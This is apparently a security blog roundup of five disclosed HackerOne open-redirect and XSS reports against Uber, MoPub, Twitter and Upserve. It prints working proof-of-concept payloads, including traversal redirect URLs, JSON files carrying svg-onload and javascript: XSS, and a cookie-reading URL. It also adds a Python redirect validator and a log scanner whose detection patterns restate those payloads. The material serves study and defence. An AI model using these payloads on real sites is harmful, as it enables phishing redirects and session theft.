白帽故事 (White Hat Stories) · 16 August 2024

The top 5 open redirect vulnerabilities on HackerOne

1. Open redirect vulnerability in central.uber.com

  • Vendor: Uber
  • Bounty: $8,000
  • Disclosure: not disclosed

2. Multiple open redirect and reflected XSS vulnerabilities in uber.com

  • Vendor: Uber
  • Bounty: $3,000
  • Disclosure:

Open redirect

The open redirect URL is uber.com/en//example.com/

CSS injection

The vulnerability is triggered through the theme parameter of the URL uber.com/?theme=../en//example.com/css-code.css%23, which produces the following tag:

<link rel="stylesheet" id="theme-css" href="https://uber.com/stylesheets/../en//example.com/css-code.css#.css">

The browser will then load the CSS code from example.com/css-code.css.

Reflected XSS

This vulnerability stems from insufficient filtering of API requests; a JSON file with the following contents was therefore placed on a domain under the reporter's control:

{  
   "id":"9999",
   "title":"XSS on Uber.com",
   "overview":"<svg onload=\"alert('XSS on '+ document.domain)\">",
   "responsibilities":null,
   "qualifications":null,
   "lastUpdated":"2016-01-16 06:29 AM",
   "formattedTeam":"xss",
   "team":"xss",
   "subTeam":"xss",
   "formattedLocation":"xss",
   "slugs":{  
      "team":"xss",
      "subTeam":"xss",
      "city":"xss",
      "country":"xss"
   },
   "city":"xss",
   "country":"xss",
   "jobUrl":"javascript:alert('XSS on '+ document.domain)",
   "normalizedTitle":"xss",
   "normalizedContent":"xss"
}

A similar XSS vector was then found at uber.com/cities/%252e%252e%2f%252e%252e%2fen%2f%2fexample.com%2ffile.json/.

The browser attempts to load the JSON content from example.com/file.json when visiting uber.com/cities/-CONTROLLED-/:

{  
   "products":[  
      {  
         "productDisplayType":"uberx",
         "fare":{  
            "safeRideFee":"USD9999.99",
            "perMinute":"USD9999.99",
            "minimum":"USD9999.99",
            "cancellation":"USD9999.99",
            "fareType":"time_plus_distance",
            "base":"USD9999.99",
            "isDistanceUnitMetric":false,
            "perDistanceUnit":"USD9999.99",
            "additionalFees":[  

            ]
         },
         "displayName":"uberX",
         "tagline":"XSS",
         "taxiFareInfo":false,
         "finePrint":[  
            "XSS"
         ]
      },
      {  
         "productDisplayType":"uberxl",
         "fare":{  
            "safeRideFee":"USD9999.99",
            "perMinute":"USD9999.99",
            "minimum":"USD9999.99",
            "cancellation":"USD9999.99",
            "fareType":"time_plus_distance",
            "base":"USD9999.99",
            "isDistanceUnitMetric":false,
            "perDistanceUnit":"USD9999.99",
            "additionalFees":[  

            ]
         },
         "displayName":"uberXL",
         "tagline":"XSS",
         "taxiFareInfo":false,
         "finePrint":[  
            "XSS"
         ]
      }
   ],
   "flatRates":[  

   ],
   "id":9999,
   "cityId":9999,
   "flatRateDisplayNames":[  

   ],
   "geoJson":null,
   "geoPoint":{  
      "latitude":33.951252,
      "longitude":-83.382943
   },
   "slug":"xss",
   "twitterHandle":null,
   "theme":{  
      "name":"united_states",
      "ctaColor":"#57AD57",
      "patternColor":"#4DB5D9",
      "patternColorBackground":"#A6DAEC"
   },
   "rideContent":"XSS",
   "driveContent":"XSS",
   "impactContent":"XSS",
   "name":"<marquee>XSS</marquee><svg onload=\"alert('XSS on '+ document.domain)\">",
   "pageTitle":"XSS",
   "pageDescription":"XSS",
   "productLegalNotice":null,
   "pageConfiguration":{  

   }
}

3. XSS and open redirect vulnerabilities in the MoPub login page

  • Vendor: Twitter
  • Bounty: $1,540
  • Disclosure:
  1. URL: https://app.mopub.com/login?next=https://google.com
  2. Visit the URL above and log in
  3. After a successful login you are redirected to google.com
  4. XSS can also be achieved via javascript:alert("xss")
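The `next` parameter above is the classic shape of this bug class: the server trusts a client-supplied destination. The following is an added defensive example, not code from MoPub or any other vendor on this page, showing the allowlist approach an application can apply before redirecting. It goes slightly beyond the MoPub case by also rejecting protocol-relative (`//host`), backslash, control-character and double-encoded forms; the function names and the sample inputs are this example's own.

```python
"""Allowlist validation for a post-login redirect target such as a `next` parameter.

Added defensive example; this is not code from MoPub, Uber, Upserve or Twitter. The function
names and the sample inputs are this example's own.
"""
import re
from urllib.parse import unquote, urlsplit

# Conservative character set for a same-origin path plus query string. It deliberately
# leaves out ':' (so no scheme such as javascript: can appear), '\' (browsers treat it
# like '/'), '#', whitespace and control characters (e.g. %01, used to defeat prefix checks).
_ALLOWED = re.compile(r"[A-Za-z0-9/\-._~?=&%+]*")


def _fully_decoded(value, max_rounds=3):
    """Percent-decode until stable so double encoding (%252e -> %2e -> .) is seen through."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_safe_local_redirect(candidate):
    """True only for a plain same-origin path like /dashboard or /account/settings?tab=1."""
    if not candidate:
        return False
    # Check both the raw and the decoded form so an encoded ':' or '\' cannot hide.
    for form in (candidate, _fully_decoded(candidate)):
        if not _ALLOWED.fullmatch(form):
            return False
        # Must be a root-relative path; '//host' is protocol-relative and leaves the site.
        if not form.startswith("/") or form.startswith("//"):
            return False
        parts = urlsplit(form)
        if parts.scheme or parts.netloc:
            return False
    # Reject empty and dot segments so that later normalisation by a framework or browser
    # cannot turn e.g. /en//example.com/ into //example.com/.
    path = _fully_decoded(candidate).split("?", 1)[0]
    segments = path.split("/")[1:]
    if segments and segments[-1] == "":
        segments = segments[:-1]          # a trailing slash is fine
    return not any(seg in ("", ".", "..") for seg in segments)


def choose_redirect(candidate, fallback="/"):
    """Return the destination the application should actually redirect to after login."""
    return candidate if is_safe_local_redirect(candidate) else fallback
```

The point of the design is that the destination is never "cleaned"; anything that is not already a plain root-relative path falls back to a fixed page. `choose_redirect("https://google.com")` therefore returns `/`, while `choose_redirect("/account/settings?tab=1")` returns the path unchanged.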


4. Open redirect vulnerability in Upserve

  • Vendor: Upserve
  • Bounty: $1,200
  • Disclosure:

https://inventory.upserve.com/http://stanko.sh/

5. XSS and open redirect vulnerabilities in dev.twitter.com

  • Vendor: Twitter
  • Bounty: $1,120
  • Disclosure:

PoC:
https://dev.twitter.com/https:/%5cblackfan.ru/

XSS PoC:

https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/
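All five reports share a handful of request shapes: an empty path segment (`/en//example.com/`), traversal inside a parameter (`theme=../`), an absolute URL in a redirect parameter (`next=https://...`), a backslash standing in for a slash, and control characters or a `javascript:` scheme in the path. The block below is an added detection example, not code from the page or from any of the vendors it names: it parses combined-format access-log lines and flags requests that trip any of those rules. The log lines and rule names are constructed for illustration.

```python
"""Flag access-log requests that look like open-redirect or path-confusion probing.

Added detection example; not code from the page or from any of the vendors it names. The log
lines and rule names below are constructed for illustration.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: client ident user [time] "METHOD target PROTOCOL" status size
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Query parameters that commonly carry a destination the server will redirect to.
_REDIRECT_PARAMS = {"next", "redirect", "redirect_uri", "return", "returnurl", "url", "goto"}


def _decode(value, rounds=3):
    """Percent-decode repeatedly so double encoding (%252e -> %2e -> .) is seen through."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def classify_target(target):
    """Return the rule names a request target trips; an empty list means nothing suspicious."""
    hits = []
    parts = urlsplit(target)
    path = _decode(parts.path)
    params = parse_qs(parts.query, keep_blank_values=True)
    values = [_decode(v) for vs in params.values() for v in vs]
    whole = _decode(target)

    if "//" in path:                                        # /en//example.com/ style
        hits.append("empty-path-segment")
    if any(seg == ".." for item in [path] + values for seg in item.split("/")):
        hits.append("dot-segment")                          # ../ in the path or a parameter
    if "\\" in whole:
        hits.append("backslash")                            # https:/\host - '\' acts like '/'
    if re.search(r"[\x00-\x1f\x7f]", whole):
        hits.append("control-char")                         # %01 used to break prefix checks
    if re.search(r"(?i)javascript:", whole):
        hits.append("javascript-scheme")
    for name, vs in params.items():
        if name.lower() in _REDIRECT_PARAMS and any(
            v.startswith("//") or re.match(r"(?i)[a-z][a-z0-9+.-]*:", v) for v in map(_decode, vs)
        ):
            hits.append("external-redirect-param")          # next=https://... leaves the site
            break
    return hits


def scan_log(lines):
    """Yield (client_ip, target, hits) for every parsable request that trips a rule."""
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        hits = classify_target(target)
        if hits:
            yield client, target, hits


# Constructed sample lines mirroring the request shapes described on the page.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Aug/2024:10:00:01 +0000] "GET /en//example.com/ HTTP/1.1" 302 0',
    '203.0.113.5 - - [16/Aug/2024:10:00:02 +0000] "GET /?theme=../en//example.com/css-code.css%23 HTTP/1.1" 200 512',
    '198.51.100.7 - - [16/Aug/2024:10:00:03 +0000] "GET /login?next=https://google.com HTTP/1.1" 200 1024',
    '198.51.100.7 - - [16/Aug/2024:10:00:04 +0000] "GET /https:/%5cblackfan.ru/ HTTP/1.1" 302 0',
    '198.51.100.7 - - [16/Aug/2024:10:00:05 +0000] "GET //x:1/:///%01javascript:alert(document.cookie)/ HTTP/1.1" 404 0',
    '192.0.2.9 - - [16/Aug/2024:10:00:06 +0000] "GET /login?next=/dashboard HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, target, hits in scan_log(SAMPLE_LOG):
        print(f"{client} {target} -> {', '.join(hits)}")
```

Run stand-alone, the script prints the five probing lines with their rule names and stays silent on the benign `next=/dashboard` request. The rules are deliberately broad (an empty path segment is rare in legitimate traffic but not impossible), so in practice they are better used to rank requests for review than as a blocking signature; the `external-redirect-param` rule is the one worth alerting on directly, since it fires regardless of encoding tricks.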
